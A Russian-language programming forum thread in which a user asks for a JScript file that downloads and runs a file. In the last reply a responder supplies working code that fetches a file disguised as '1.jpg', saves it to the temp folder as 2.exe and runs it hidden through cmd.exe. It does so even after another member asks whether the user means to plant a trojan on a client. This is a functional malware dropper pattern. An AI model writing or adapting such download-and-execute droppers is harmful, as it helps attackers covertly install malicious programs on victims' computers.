Форум программистов, компьютерный форум, киберфорум
Наши страницы

JavaScript

Войти
Регистрация
Восстановить пароль
 
VPN
0 / 0 / 0
Регистрация: 02.02.2016
Сообщений: 7
#1

Скачать скриптом .js - JavaScript

28.02.2016, 06:44. Просмотров 231. Ответов 4
Метки нет (Все метки)

Уважаемые Гуру,подскажите код скрипта .js который скачает файл с интернета.
К примеру есть http://www.win-rar.com/fileadmin/winrar-versions/wrar520.exe чтобы при запуске скрипт.js на пк происходила скачка wrar520.exe
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.02.2016, 06:44
Я подобрал для вас темы с готовыми решениями и ответами на вопрос Скачать скриптом .js (JavaScript):

как сделать так, чтобы создав cookies клиентским скриптом я могу получить к нему доступ серверным скриптом? - JavaScript
Добры день!!! Вот допустим я создаю cookie из JavaScript. В самом фале cookies будет создано несколько строк: IF_LastVisit - название...

Свернуть скриптом - JavaScript
Доброго времени суток! Можно ли при щелчке на кнопку свернуть окно браузера? Я почитал, написано что окно свернется только если это...

Помогите со скриптом - JavaScript
Помогите пожалуйста. Нужен скрипт, чтобы при закрытии вкладки браузера, после того как нажимаешь выскакивало окно, и в этом окне нужно...

Помогите со скриптом,пожалуйста - JavaScript
Помогите со скриптом,пожалуйста Была давненько такая тема где между <div class="name">бла-бла</div> <div...

Создать страницу со скриптом - JavaScript
Создать страницу со скриптом, которая выводила бы сообщение « Нажмите кнопку для замены текста страницы» с кнопками «да» и «нет». В...

Создать страницу со скриптом - JavaScript
Создать страницу со скриптом, который бы средствами скрипта выводил cos(x), где x – числовая переменная, которой присвоено некоторое...

4
alexsamos33
606 / 586 / 199
Регистрация: 26.04.2014
Сообщений: 1,926
28.02.2016, 13:19 #2
VPN,
Javascript
1
2
3
4
5
6
7
8
9
10
var oXMLHTTP = new ActiveXObject("MSXML2.XMLHTTP");
oXMLHTTP.Open("GET", "http://www.win-rar.com/fileadmin/winrar-versions/wrar520.exe", false);
oXMLHTTP.Send("");
var oADOStream = new ActiveXObject("ADODB.Stream");
oADOStream.Mode = 3; // read write
oADOStream.Type = 1; // Binary
oADOStream.Open();
oADOStream.Write(oXMLHTTP.responseBody);
oADOStream.SaveToFile(".\\wrar520.exe", 2); // save rewrite // сохранить в текущую папку
// oADOStream.SaveToFile("C:\\folder\\wrar520.exe", 2); // save rewrite // сохранить в указанную папку
Добавлено через 1 минуту
Сохраняете в файл с расширением .js и двойным кликом запускаете...

Добавлено через 1 минуту
* и обратите внимание, что в js слеши надо экранировать, т.е. писать по два раза: один\\два\\три\\файл.exe

Добавлено через 1 минуту
И эта тема больше подходит для раздела VBScript/JScript/WSH/WMI/HTA...
1
VPN
0 / 0 / 0
Регистрация: 02.02.2016
Сообщений: 7
28.02.2016, 14:17  [ТС] #3
alexsamos33,благодарю


возможно дополнить скрипт?
скачать файл 1.jpg в temp переименовать его в 2.exe и 2.ехе запустить
0
BANO
28.02.2016, 14:21
  #4

Не по теме:

VPN, а не троян ли вы хотите скачать клиенту? -_-

0
alexsamos33
606 / 586 / 199
Регистрация: 26.04.2014
Сообщений: 1,926
28.02.2016, 14:39 #5
VPN,
Javascript
1
2
3
4
5
6
7
8
9
10
11
12
13
var oXMLHTTP = new ActiveXObject("MSXML2.XMLHTTP");
oXMLHTTP.Open("GET", "http://example.com/files/1.jpg", false);
oXMLHTTP.Send("");
var oADOStream = new ActiveXObject("ADODB.Stream");
var WSHShell = WScript.CreateObject("WScript.Shell");
var tmp=WSHShell.ExpandEnvironmentStrings("%temp%");
oADOStream.Mode = 3; // read write
oADOStream.Type = 1; // Binary
oADOStream.Open();
oADOStream.Write(oXMLHTTP.responseBody);
oADOStream.SaveToFile(tmp+"\\2.exe", 2); // save rewrite // сохранить во временную папку temp
WSHShell.CurrentDirectory = tmp;
WSHShell.Run('cmd.exe /c "'+tmp+'\\2.exe"', 0); // запускаем
0
28.02.2016, 14:39
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
28.02.2016, 14:39
Привет! Вот еще темы с ответами:

Создать страницу со скриптом - JavaScript
надо сделать: Вариант 1: Создать страницу со скриптом, в котором создается объект машина с тремя свойствами: цвет, марка, модель....

Не могу разобраться со скриптом - JavaScript
Я начинающая программистка. Подскажите как будет правильно показывать каждые 3 минуты чтобы прибавлялась 1 единица начиная с сегодняшнего...

Связь формы с скриптом... - JavaScript
что-то не особо получается связать значение формы со скриптом. нужно передать значение из поля формы в "cookie.name" <form...

Проблемы со скриптом в IE8 - JavaScript
Помогите пожалуйста разобраться... везде работает, кроме IE8 и ниже. <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
5
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2018, vBulletin Solutions, Inc.
Рейтинг@Mail.ru